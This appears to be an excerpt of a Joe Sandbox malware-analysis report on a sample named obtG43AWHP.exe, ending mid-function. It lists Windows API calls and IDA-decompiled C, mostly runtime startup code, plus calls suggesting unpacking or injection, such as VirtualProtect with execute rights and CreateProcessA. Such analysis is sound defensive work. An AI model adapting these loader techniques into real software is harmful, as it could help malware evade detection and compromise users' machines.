      • Part of subcall function 03004E89: EncodePointer.KERNEL32(?,03002D9E), ref: 03004F6D
      • Part of subcall function 03004E89: EncodePointer.KERNEL32(?,03002D9E), ref: 03004F7A
      • Part of subcall function 03004E89: EncodePointer.KERNEL32(?,03002D9E), ref: 03004F87
      • Part of subcall function 03004E89: DecodePointer.KERNEL32(03004D5A,?,03002D9E), ref: 03004FA8
      • Part of subcall function 03004E89: DecodePointer.KERNEL32(00000000,?,03002D9E), ref: 03004FD7
      • Part of subcall function 03004E89: GetCurrentThreadId.KERNEL32(?,03002D9E), ref: 03004FE9
    • __RTC_Initialize.LIBCMT ref: 03002DAA
      • Part of subcall function 030048FF: GetStartupInfoW.KERNEL32(?), ref: 0300490C
      • Part of subcall function 030048FF: GetFileType.KERNEL32(?), ref: 03004A3F
      • Part of subcall function 030048FF: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 03004A75
      • Part of subcall function 030048FF: GetStdHandle.KERNEL32(-000000F6), ref: 03004AC9
      • Part of subcall function 030048FF: GetFileType.KERNEL32(00000000), ref: 03004ADB
      • Part of subcall function 030048FF: InitializeCriticalSectionAndSpinCount.KERNEL32(-03012F74,00000FA0), ref: 03004B09
      • Part of subcall function 030048FF: SetHandleCount.KERNEL32 ref: 03004B32
    • __amsg_exit.LIBCMT ref: 03002DBD
    • GetCommandLineW.KERNEL32 ref: 03002DC3
      • Part of subcall function 030048A7: GetEnvironmentStringsW.KERNEL32(00000000,03002DD3), ref: 030048AA
      • Part of subcall function 030048A7: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 030048E6
      • Part of subcall function 030047F9: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\obtG43AWHP.exe,00000104), ref: 03004819
      • Part of subcall function 030047F9: _wparse_cmdline.LIBCMT ref: 03004843
      • Part of subcall function 030047F9: _wparse_cmdline.LIBCMT ref: 03004885
    • __amsg_exit.LIBCMT ref: 03002DE3
      • Part of subcall function 030045C7: _wcslen.LIBCMT ref: 030045E7
      • Part of subcall function 030045C7: _wcslen.LIBCMT ref: 0300461F
    • __amsg_exit.LIBCMT ref: 03002DF4
      • Part of subcall function 03003FEA: __initterm_e.LIBCMT ref: 03004020
    • __amsg_exit.LIBCMT ref: 03002E07
      • Part of subcall function 0300966F: _strlen.LIBCMT ref: 0300967E
      • Part of subcall function 0300966F: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 030096AA
      • Part of subcall function 0300966F: ShellAboutW.SHELL32(00000000,00000000,00000000,00000000), ref: 030096B4
      • Part of subcall function 0300966F: ExtractIconA.SHELL32(00000000,00000000,00000000), ref: 030096BD
      • Part of subcall function 0300966F: GetColorSpace.GDI32(00000000), ref: 030096DF
      • Part of subcall function 0300966F: GetLogColorSpaceA.GDI32(00000000,00000000,00000000), ref: 030096E8
      • Part of subcall function 0300966F: ChoosePixelFormat.GDI32(00000000,?), ref: 030096F3
      • Part of subcall function 0300966F: SetICMMode.GDI32(00000000,00000000), ref: 030096FB
      • Part of subcall function 0300966F: GetPrivateProfileSectionNamesA.KERNEL32(0300CB48,00000000,doifughsg siodufhg sdfoughjsiopdfughj), ref: 0300970E
      • Part of subcall function 0300966F: GetCalendarInfoW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?), ref: 0300971F
      • Part of subcall function 0300966F: GetLocaleInfoW.KERNEL32(00000000,00000000,0300CF50,00000000), ref: 0300972D
      • Part of subcall function 0300966F: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 03009760
      • Part of subcall function 0300966F: LocalAlloc.KERNELBASE(00000000,000583E9), ref: 03009778
      • Part of subcall function 0300966F: VirtualProtect.KERNELBASE(00000000,000583E9,00000040,?), ref: 030097D9
      • Part of subcall function 0300966F: GetTickCount.KERNEL32 ref: 030097E4
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    Function 030048FF, Relevance: 10.7, APIs: 7, Instructions: 196
    C-Code - Quality: 78%
    			E030048FF() {
				intOrPtr* _v8;
				void** _v12;
				struct _STARTUPINFOW _v80;
				signed int _t61;
				void* _t62;
				long _t65;
				signed int _t68;
				signed int _t69;
				signed int _t70;
				int _t72;
				signed int _t73;
				intOrPtr* _t74;
				void* _t77;
				long _t85;
				signed int _t86;
				signed int _t87;
				signed int _t88;
				signed int _t91;
				int _t93;
				signed char _t98;
				void* _t108;
				signed int _t110;
				signed int* _t111;
				int _t112;
				void** _t115;
				void** _t120;
				signed int _t121;

				GetStartupInfoW( &_v80);
				_push(0x40);
				_t112 = 0x20;
				_push(_t112); // executed
				_t61 = E03006933(); // executed
				if(_t61 != 0) {
					_t2 = _t61 + 0x800; // 0x800
					 *0x3012f80 = _t61;
					 *0x3012f68 = _t112;
					__eflags = _t61 - _t2;
					if(_t61 >= _t2) {
						L5:
						__eflags = _v80.cbReserved2;
						if(_v80.cbReserved2 == 0) {
							L27:
							_t91 = 0;
							__eflags = 0;
							do {
								_t115 = (_t91 << 6) +  *0x3012f80;
								_t62 =  *_t115;
								__eflags = _t62 - 0xffffffff;
								if(_t62 == 0xffffffff) {
									L31:
									_t115[1] = 0x81;
									__eflags = _t91;
									if(_t91 != 0) {
										_t50 = _t91 - 1; // -1
										asm("sbb eax, eax");
										_t65 =  ~_t50 + 0xfffffff5;
										__eflags = _t65;
									} else {
										_t65 = 0xfffffff6;
									}
									_t108 = GetStdHandle(_t65);
									__eflags = _t108 - 0xffffffff;
									if(_t108 == 0xffffffff) {
										L43:
										_t58 =  &(_t115[1]);
										 *_t58 = _t115[1] | 0x00000040;
										__eflags =  *_t58;
										 *_t115 = 0xfffffffe;
										goto L44;
									} else {
										__eflags = _t108;
										if(_t108 == 0) {
											goto L43;
										}
										_t69 = GetFileType(_t108);
										__eflags = _t69;
										if(_t69 == 0) {
											goto L43;
										}
										_t70 = _t69 & 0x000000ff;
										 *_t115 = _t108;
										__eflags = _t70 - 2;
										if(_t70 != 2) {
											__eflags = _t70 - 3;
											if(_t70 == 3) {
												_t53 =  &(_t115[1]);
												 *_t53 = _t115[1] | 0x00000008;
												__eflags =  *_t53;
											}
										} else {
											_t115[1] = _t115[1] | 0x00000040;
										}
										_t55 =  &(_t115[3]); // -50409332
										_t72 = InitializeCriticalSectionAndSpinCount(_t55, 0xfa0);
										__eflags = _t72;
										if(_t72 == 0) {
											L48:
											_t68 = _t72 | 0xffffffff;
											L46:
											return _t68;
										} else {
											_t115[2] = _t115[2] + 1;
											goto L44;
										}
									}
								}
								__eflags = _t62 - 0xfffffffe;
								if(_t62 == 0xfffffffe) {
									goto L31;
								}
								_t115[1] = _t115[1] | 0x00000080;
								L44:
								_t91 = _t91 + 1;
								__eflags = _t91 - 3;
							} while (_t91 < 3);
							SetHandleCount( *0x3012f68);
							_t68 = 0;
							__eflags = 0;
							goto L46;
						}
						_t73 = _v80.lpReserved2;
						__eflags = _t73;
						if(_t73 == 0) {
							goto L27;
						}
						_t93 =  *_t73;
						_t74 = _t73 + 4;
						_v8 = _t74;
						_v12 = _t74 + _t93;
						__eflags = _t93 - 0x800;
						if(_t93 >= 0x800) {
							_t93 = 0x800;
						}
						__eflags =  *0x3012f68 - _t93; // 0x20
						if(__eflags >= 0) {
							L18:
							_t110 = 0;
							__eflags = _t93;
							if(_t93 <= 0) {
								goto L27;
							} else {
								goto L19;
							}
							do {
								L19:
								_t77 =  *_v12;
								__eflags = _t77 - 0xffffffff;
								if(_t77 == 0xffffffff) {
									goto L26;
								}
								__eflags = _t77 - 0xfffffffe;
								if(_t77 == 0xfffffffe) {
									goto L26;
								}
								_t98 =  *_v8;
								__eflags = _t98 & 0x00000001;
								if((_t98 & 0x00000001) == 0) {
									goto L26;
								}
								__eflags = _t98 & 0x00000008;
								if((_t98 & 0x00000008) != 0) {
									L24:
									_t120 = ((_t110 & 0x0000001f) << 6) + 0x3012f80[_t110 >> 5];
									 *_t120 =  *_v12;
									_t120[1] =  *_v8;
									_t40 =  &(_t120[3]); // 0xc
									_t72 = InitializeCriticalSectionAndSpinCount(_t40, 0xfa0);
									__eflags = _t72;
									if(_t72 == 0) {
										goto L48;
									}
									_t41 =  &(_t120[2]);
									 *_t41 = _t120[2] + 1;
									__eflags =  *_t41;
									goto L26;
								}
								_t85 = GetFileType(_t77);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L26;
								}
								goto L24;
								L26:
								_v12 =  &(_v12[1]);
								_t110 = _t110 + 1;
								_v8 = _v8 + 1;
								__eflags = _t110 - _t93;
							} while (_t110 < _t93);
							goto L27;
						} else {
							_t111 = 0x3012f84;
							while(1) {
								_t86 = E03006933(0x20, 0x40);
								__eflags = _t86;
								if(_t86 == 0) {
									break;
								}
								 *0x3012f68 =  *0x3012f68 + 0x20;
								_t16 = _t86 + 0x800; // 0x800
								 *_t111 = _t86;
								__eflags = _t86 - _t16;
								if(_t86 >= _t16) {
									L15:
									_t111 =  &(_t111[1]);
									__eflags =  *0x3012f68 - _t93; // 0x20
									if(__eflags < 0) {
										continue;
									}
									goto L18;
								}
								_t87 = _t86 + 5;
								__eflags = _t87;
								do {
									 *(_t87 - 5) =  *(_t87 - 5) | 0xffffffff;
									 *(_t87 + 3) =  *(_t87 + 3) & 0x00000000;
									 *(_t87 + 0x1f) =  *(_t87 + 0x1f) & 0x00000080;
									 *(_t87 + 0x33) =  *(_t87 + 0x33) & 0x00000000;
									 *((short*)(_t87 - 1)) = 0xa00;
									 *((short*)(_t87 + 0x20)) = 0xa0a;
									 *((char*)(_t87 + 0x2f)) = 0;
									_t87 = _t87 + 0x40;
									_t28 = _t87 - 5; // -74
									__eflags = _t28 -  *_t111 + 0x800;
								} while (_t28 <  *_t111 + 0x800);
								goto L15;
							}
							_t93 =  *0x3012f68; // 0x20
							goto L18;
						}
					}
					_t88 = _t61 + 5;
					__eflags = _t88;
					do {
						 *(_t88 - 5) =  *(_t88 - 5) | 0xffffffff;
						 *((short*)(_t88 - 1)) = 0xa00;
						 *((intOrPtr*)(_t88 + 3)) = 0;
						 *((short*)(_t88 + 0x1f)) = 0xa00;
						 *((char*)(_t88 + 0x21)) = 0xa;
						 *((intOrPtr*)(_t88 + 0x33)) = 0;
						 *((char*)(_t88 + 0x2f)) = 0;
						_t121 =  *0x3012f80; // 0x12809f0
						_t88 = _t88 + 0x40;
						_t11 = _t88 - 5; // -74
						__eflags = _t11 - _t121 + 0x800;
					} while (_t11 < _t121 + 0x800);
					goto L5;
				}
				return _t61 | 0xffffffff;
			}






























    0x0300490c
    0x03004912
    0x03004916
    0x03004917
    0x03004918
    0x03004923
    0x0300492d
    0x03004933
    0x03004938
    0x0300493e
    0x03004940
    0x03004978
    0x0300497a
    0x0300497e
    0x03004a92
    0x03004a92
    0x03004a92
    0x03004a94
    0x03004a99
    0x03004a9f
    0x03004aa1
    0x03004aa4
    0x03004ab1
    0x03004ab1
    0x03004ab5
    0x03004ab7
    0x03004abe
    0x03004ac3
    0x03004ac5
    0x03004ac5
    0x03004ab9
    0x03004abb
    0x03004abb
    0x03004acf
    0x03004ad1
    0x03004ad4
    0x03004b18
    0x03004b18
    0x03004b18
    0x03004b18
    0x03004b1c
    0x00000000
    0x03004ad6
    0x03004ad6
    0x03004ad8
    0x00000000
    0x00000000
    0x03004adb
    0x03004ae1
    0x03004ae3
    0x00000000
    0x00000000
    0x03004ae5
    0x03004aea
    0x03004aec
    0x03004aef
    0x03004af7
    0x03004afa
    0x03004afc
    0x03004afc
    0x03004afc
    0x03004afc
    0x03004af1
    0x03004af1
    0x03004af1
    0x03004b05
    0x03004b09
    0x03004b0f
    0x03004b11
    0x03004b3f
    0x03004b3f
    0x03004b3a
    0x00000000
    0x03004b13
    0x03004b13
    0x00000000
    0x03004b13
    0x03004b11
    0x03004ad4
    0x03004aa6
    0x03004aa9
    0x00000000
    0x00000000
    0x03004aab
    0x03004b22
    0x03004b22
    0x03004b23
    0x03004b23
    0x03004b32
    0x03004b38
    0x03004b38
    0x00000000
    0x03004b38
    0x03004984
    0x03004987
    0x03004989
    0x00000000
    0x00000000
    0x0300498f
    0x03004991
    0x03004994
    0x0300499e
    0x030049a1
    0x030049a3
    0x030049a5
    0x030049a5
    0x030049a7
    0x030049ad
    0x03004a1a
    0x03004a1a
    0x03004a1c
    0x03004a1e
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x03004a20
    0x03004a20
    0x03004a23
    0x03004a25
    0x03004a28
    0x00000000
    0x00000000
    0x03004a2a
    0x03004a2d
    0x00000000
    0x00000000
    0x03004a32
    0x03004a34
    0x03004a37
    0x00000000
    0x00000000
    0x03004a39
    0x03004a3c
    0x03004a49
    0x03004a56
    0x03004a62
    0x03004a69
    0x03004a71
    0x03004a75
    0x03004a7b
    0x03004a7d
    0x00000000
    0x00000000
    0x03004a83
    0x03004a83
    0x03004a83
    0x00000000
    0x03004a83
    0x03004a3f
    0x03004a45
    0x03004a47
    0x00000000
    0x00000000
    0x00000000
    0x03004a86
    0x03004a86
    0x03004a8a
    0x03004a8b
    0x03004a8e
    0x03004a8e
    0x00000000
    0x030049af
    0x030049af
    0x030049b4
    0x030049b8
    0x030049bf
    0x030049c1
    0x00000000
    0x00000000
    0x030049c3
    0x030049ca
    0x030049d0
    0x030049d2
    0x030049d4
    0x03004a07
    0x03004a07
    0x03004a0a
    0x03004a10
    0x00000000
    0x00000000
    0x00000000
    0x03004a12
    0x030049d6
    0x030049d6
    0x030049d9
    0x030049d9
    0x030049dd
    0x030049e1
    0x030049e5
    0x030049e9
    0x030049ef
    0x030049f5
    0x030049fb
    0x03004a00
    0x03004a03
    0x03004a03
    0x00000000
    0x030049d9
    0x03004a14
    0x00000000
    0x03004a14
    0x030049ad
    0x03004942
    0x03004942
    0x03004945
    0x03004945
    0x03004949
    0x0300494f
    0x03004952
    0x03004958
    0x0300495c
    0x0300495f
    0x03004962
    0x03004968
    0x0300496b
    0x03004974
    0x03004974
    0x00000000
    0x03004945
    0x00000000

    APIs
    • GetStartupInfoW.KERNEL32(?), ref: 0300490C
      • Part of subcall function 03006933: Sleep.KERNEL32(00000000,03002BF3), ref: 0300695B
    • GetFileType.KERNEL32(?), ref: 03004A3F
    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 03004A75
    • GetStdHandle.KERNEL32(-000000F6), ref: 03004AC9
    • GetFileType.KERNEL32(00000000), ref: 03004ADB
    • InitializeCriticalSectionAndSpinCount.KERNEL32(-03012F74,00000FA0), ref: 03004B09
    • SetHandleCount.KERNEL32 ref: 03004B32
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    Function 0027E380, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
    APIs
    • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0027E493
    • PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0027E4B6
      • Part of subcall function 0027E080: VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0027E0C6
      • Part of subcall function 0027E080: GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0027E0DC
      • Part of subcall function 0027E080: CreateProcessA.KERNEL32(?,00000000), ref: 0027E1C2
      • Part of subcall function 0027E080: VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0027E1F0
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1453650771.0027D000.00000040.sdmp, Offset: 0027D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_27d000_obtG43AWHP.jbxd
    Function 03004081, Relevance: 7.6, APIs: 5, Instructions: 98
    C-Code - Quality: 24%
    			E03004081(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				intOrPtr* _t40;
				intOrPtr _t43;
				intOrPtr _t45;
				intOrPtr _t47;
				intOrPtr* _t52;
				intOrPtr* _t54;
				void* _t55;
				void* _t57;

				_push(0x20);
				_push(0x3009828);
				E03005030(__ebx, __edi, __esi);
				E03006E8E(__ebx, __edi, 8);
				 *(_t55 - 4) =  *(_t55 - 4) & 0x00000000;
				_t57 =  *0x300be00 - 1; // 0x1
				if(_t57 != 0) {
					 *0x300bdfc = 1;
					_t34 =  *((intOrPtr*)(_t55 + 0x10));
					 *0x300bdf8 =  *((intOrPtr*)(_t55 + 0x10));
					if( *((intOrPtr*)(_t55 + 0xc)) == 0) {
						_t54 = __imp__DecodePointer; // executed
						_t34 =  *_t54( *0x3013088); // executed
						_t45 = 1;
						 *((intOrPtr*)(_t55 - 0x30)) = 1;
						if(1 != 0) {
							_t34 =  *_t54( *0x3013084); // executed
							_t52 = 1;
							 *((intOrPtr*)(_t55 - 0x2c)) = 1;
							 *((intOrPtr*)(_t55 - 0x24)) = 1;
							 *((intOrPtr*)(_t55 - 0x28)) = 1;
							while(1) {
								_t52 = _t52 - 4;
								 *((intOrPtr*)(_t55 - 0x2c)) = _t52;
								if(_t52 < _t45) {
									goto L11;
								}
								if( *_t52 == _t34) {
									continue;
								} else {
									if(_t52 >= _t45) {
										_t40 =  *_t54( *_t52); // executed
										 *_t52 = E03004B90(_t40);
										 *_t40();
										_t43 =  *_t54( *0x3013088); // executed
										_t47 = _t43;
										_t34 =  *_t54( *0x3013084); // executed
										if( *((intOrPtr*)(_t55 - 0x24)) != _t47 ||  *((intOrPtr*)(_t55 - 0x28)) != _t34) {
											 *((intOrPtr*)(_t55 - 0x24)) = _t47;
											 *((intOrPtr*)(_t55 - 0x30)) = _t47;
											 *((intOrPtr*)(_t55 - 0x28)) = _t34;
											_t52 = _t34;
											 *((intOrPtr*)(_t55 - 0x2c)) = _t52;
										}
										_t45 =  *((intOrPtr*)(_t55 - 0x30));
										continue;
									}
								}
								goto L11;
							}
						}
						L11:
						 *((intOrPtr*)(_t55 - 0x1c)) = 0x3001164;
						while( *((intOrPtr*)(_t55 - 0x1c)) < 0x3001170) {
							_t34 =  *((intOrPtr*)( *((intOrPtr*)(_t55 - 0x1c))));
							if(_t34 != 0) {
								_t34 =  *_t34();
							}
							 *((intOrPtr*)(_t55 - 0x1c)) =  *((intOrPtr*)(_t55 - 0x1c)) + 4;
						}
					}
					 *((intOrPtr*)(_t55 - 0x20)) = 0x3001174;
					while( *((intOrPtr*)(_t55 - 0x20)) < 0x3001178) {
						_t34 =  *((intOrPtr*)( *((intOrPtr*)(_t55 - 0x20))));
						if(_t34 != 0) {
							_t34 =  *_t34();
						}
						 *((intOrPtr*)(_t55 - 0x20)) =  *((intOrPtr*)(_t55 - 0x20)) + 4;
					}
				}
				 *(_t55 - 4) = 0xfffffffe;
				L23();
				if( *((intOrPtr*)(_t55 + 0x10)) != 0) {
					return E03005075(_t34);
				} else {
					 *0x300be00 = 1;
					_t36 = E03006DB5(8);
					E03003F69( *((intOrPtr*)(_t55 + 8))); // executed
					if( *((intOrPtr*)(_t55 + 0x10)) != 0) {
						return E03006DB5(8);
					}
					return _t36;
				}
			}












    0x03004081
    0x03004083
    0x03004088
    0x0300408f
    0x03004095
    0x0300409c
    0x030040a2
    0x030040a8
    0x030040ad
    0x030040b0
    0x030040b9
    0x030040c5
    0x030040cb
    0x030040cd
    0x030040cf
    0x030040d4
    0x030040dc
    0x030040de
    0x030040e0
    0x030040e3
    0x030040e6
    0x030040e9
    0x030040e9
    0x030040ec
    0x030040f1
    0x00000000
    0x00000000
    0x030040fa
    0x00000000
    0x030040fc
    0x030040fe
    0x03004102
    0x0300410b
    0x0300410d
    0x03004115
    0x03004117
    0x0300411f
    0x03004124
    0x0300412b
    0x0300412e
    0x03004131
    0x03004134
    0x03004136
    0x03004136
    0x03004139
    0x00000000
    0x03004139
    0x030040fe
    0x00000000
    0x030040fa
    0x030040e9
    0x0300413e
    0x0300413e
    0x03004145
    0x03004151
    0x03004155
    0x03004157
    0x03004157
    0x03004159
    0x03004159
    0x03004145
    0x0300415f
    0x03004166
    0x03004172
    0x03004176
    0x03004178
    0x03004178
    0x0300417a
    0x0300417a
    0x03004166
    0x03004180
    0x03004187
    0x03004190
    0x030041c0
    0x03004192
    0x03004192
    0x0300419e
    0x030041a7
    0x030041b0
    0x00000000
    0x030041b9
    0x030041ba
    0x030041ba

    APIs
      • Part of subcall function 03006E8E: __amsg_exit.LIBCMT ref: 03006EB0
      • Part of subcall function 03006E8E: EnterCriticalSection.KERNEL32(?,?,?,03004C5D,0000000D), ref: 03006EB8
    • DecodePointer.KERNEL32(03009828,00000020,030041E8,?,00000001,00000000,?,03004228,000000FF,?,03006EB5,00000011,?,?,03004C5D,0000000D), ref: 030040CB
    • DecodePointer.KERNEL32(?,03004228,000000FF,?,03006EB5,00000011,?,?,03004C5D,0000000D), ref: 030040DC
      • Part of subcall function 03004B90: EncodePointer.KERNEL32(00000000,030073D2,0300BE08,00000314,00000000,?,?,?,?,?,0300438C,0300BE08,Microsoft Visual C++ Runtime Library,00012010), ref: 03004B92
    • DecodePointer.KERNEL32(-00000004,?,03004228,000000FF,?,03006EB5,00000011,?,?,03004C5D,0000000D), ref: 03004102
    • DecodePointer.KERNEL32(?,03004228,000000FF,?,03006EB5,00000011,?,?,03004C5D,0000000D), ref: 03004115
    • DecodePointer.KERNEL32(?,03004228,000000FF,?,03006EB5,00000011,?,?,03004C5D,0000000D), ref: 0300411F
      • Part of subcall function 03006DB5: LeaveCriticalSection.KERNEL32(?,03006E8C,0000000A,03006E7C,03009958,0000000C,03006EA9,?,?,?,03004C5D,0000000D), ref: 03006DC4
      • Part of subcall function 03003F69: ExitProcess.KERNEL32 ref: 03003F7A
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    Function 0300711B, Relevance: 7.6, APIs: 5, Instructions: 74
    C-Code - Quality: 21%
    			E0300711B(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t11;
				intOrPtr* _t12;
				intOrPtr _t13;
				intOrPtr _t17;
				intOrPtr _t18;
				void* _t19;
				intOrPtr _t22;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				void* _t27;
				void* _t33;
				signed int _t36;
				intOrPtr* _t37;
				void* _t39;
				intOrPtr* _t40;
				intOrPtr* _t41;

				_t40 = __imp__DecodePointer;
				_t11 =  *_t40( *0x3013088, _t33, _t39, _t23, _t27); // executed
				_t24 = _t11;
				_v8 = _t24;
				_t12 =  *_t40( *0x3013084); // executed
				_t41 = _t12;
				if(_t41 < _t24) {
					L11:
					_t13 = 0;
				} else {
					_t36 = _t41 - _t24;
					_t2 = _t36 + 4; // 0x4
					if(_t2 < 4) {
						goto L11;
					} else {
						_t26 = E03008D8B(_t24);
						_t3 = _t36 + 4; // 0x4
						if(_t26 >= _t3) {
							L10:
							_t37 = __imp__EncodePointer; // executed
							_t17 =  *_t37(_a4); // executed
							 *_t41 = _t17;
							_t18 =  *_t37(_t41 + 4); // executed
							 *0x3013084 = _t18;
							_t13 = _a4;
						} else {
							_t19 = 0x800;
							if(_t26 < 0x800) {
								_t19 = _t26;
							}
							_t20 = _t19 + _t26;
							if(_t19 + _t26 < _t26) {
								L7:
								_t5 = _t26 + 0x10; // 0x10
								_t21 = _t5;
								if(_t5 < _t26) {
									goto L11;
								} else {
									_t22 = E0300697F(_v8, _t21);
									if(_t22 == 0) {
										goto L11;
									} else {
										goto L9;
									}
								}
							} else {
								_t22 = E0300697F(_v8, _t20);
								if(_t22 != 0) {
									L9:
									_t41 = _t22 + (_t36 >> 2) * 4;
									__imp__EncodePointer(_t22);
									 *0x3013088 = _t22;
									goto L10;
								} else {
									goto L7;
								}
							}
						}
					}
				}
				return _t13;
			}





















    0x03007123
    0x03007130
    0x03007138
    0x0300713a
    0x0300713d
    0x0300713f
    0x03007143
    0x030071ca
    0x030071ca
    0x03007149
    0x0300714b
    0x0300714d
    0x03007153
    0x00000000
    0x03007155
    0x0300715b
    0x0300715d
    0x03007163
    0x030071ad
    0x030071b0
    0x030071b6
    0x030071b8
    0x030071be
    0x030071c0
    0x030071c5
    0x03007165
    0x03007165
    0x0300716c
    0x0300716e
    0x0300716e
    0x03007170
    0x03007174
    0x03007185
    0x03007185
    0x03007185
    0x0300718a
    0x00000000
    0x0300718c
    0x03007190
    0x03007199
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x03007199
    0x03007176
    0x0300717a
    0x03007183
    0x0300719b
    0x0300719f
    0x030071a2
    0x030071a8
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x03007183
    0x03007174
    0x03007163
    0x03007153
    0x030071d0

    APIs
    • DecodePointer.KERNEL32(?,?,?,?,?,0300721F,?,03009998,0000000C,0300724B,?,?,03004037,03004B6A), ref: 03007130
    • DecodePointer.KERNEL32(?,?,?,?,?,0300721F,?,03009998,0000000C,0300724B,?,?,03004037,03004B6A), ref: 0300713D
      • Part of subcall function 03008D8B: HeapSize.KERNEL32(00000000,00000000,?,00000003,03006CFD,03009938,00000008,03003F2A), ref: 03008DB6
      • Part of subcall function 0300697F: Sleep.KERNEL32(00000000,00000000,00000000,?,03007195,00000000,00000010,?,?,?,?,?,0300721F,?,03009998,0000000C), ref: 030069A9
    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,0300721F,?,03009998,0000000C,0300724B,?,?,03004037,03004B6A), ref: 030071A2
    • EncodePointer.KERNEL32(?,?,?,?,?,?,0300721F,?,03009998,0000000C,0300724B,?,?,03004037,03004B6A), ref: 030071B6
    • EncodePointer.KERNEL32(-00000004,?,?,?,?,?,0300721F,?,03009998,0000000C,0300724B,?,?,03004037,03004B6A), ref: 030071BE
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    Function 0027E510, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
    APIs
    • GetFileAttributesA.KERNELBASE(apfHQ), ref: 0027E54C
      • Part of subcall function 0027E380: CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0027E493
      • Part of subcall function 0027E380: PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0027E4B6
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1453650771.0027D000.00000040.sdmp, Offset: 0027D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_27d000_obtG43AWHP.jbxd
    Function 030045C7, Relevance: 3.1, APIs: 2, Instructions: 131
    C-Code - Quality: 90%
    			E030045C7(signed int __eax, void* __ebx, signed int** _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				signed int _t34;
				signed int _t36;
				signed int _t39;
				void* _t40;
				signed int _t41;
				void* _t42;
				signed short* _t44;
				signed int** _t45;
				void* _t46;
				signed int _t47;
				signed int* _t55;
				signed int _t56;
				signed int _t57;
				signed int _t58;
				signed int _t60;
				signed int _t69;
				unsigned int _t71;
				signed int _t73;
				signed int _t75;
				intOrPtr* _t77;
				void* _t80;
				signed short* _t82;
				signed int _t83;
				signed int* _t85;
				void* _t90;

				_t46 = __ebx;
				_t82 =  *0x300bdc4; // 0x0
				_t73 = 0;
				if(_t82 != 0) {
					while(1) {
						_t34 =  *_t82 & 0x0000ffff;
						if(_t34 != 0) {
							if(_t34 != 0x3d) {
								_t73 = _t73 + 1;
							}
						} else {
							break;
						}
						_t82 = _t82 + 2 + E0300765A(_t82) * 2;
					}
					_push(_t46);
					_t36 = E03006933(_t73 + 1, 4);
					_t47 = _t36;
					 *0x300bde8 = _t47;
					if(_t47 != 0) {
						_t83 =  *0x300bdc4; // 0x0
						while( *_t83 != 0) {
							_t4 = E0300765A(_t83) + 1; // 0x1
							_t75 = _t4;
							if( *_t83 == 0x3d) {
								L13:
								_t83 = _t83 + _t75 * 2;
								continue;
							} else {
								_t40 = E03006933(_t75, 2); // executed
								_pop(_t55);
								 *_t47 = _t40;
								if(_t40 == 0) {
									_t41 = E03006891( *0x300bde8);
									 *0x300bde8 =  *0x300bde8 & 0x00000000;
									_t39 = _t41 | 0xffffffff;
									L16:
									goto L17;
								} else {
									_t42 = E03007675(_t40, _t75, _t83);
									_t90 = _t90 + 0xc;
									if(_t42 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_t44 = E03003E01();
										asm("int3");
										_push(_t55);
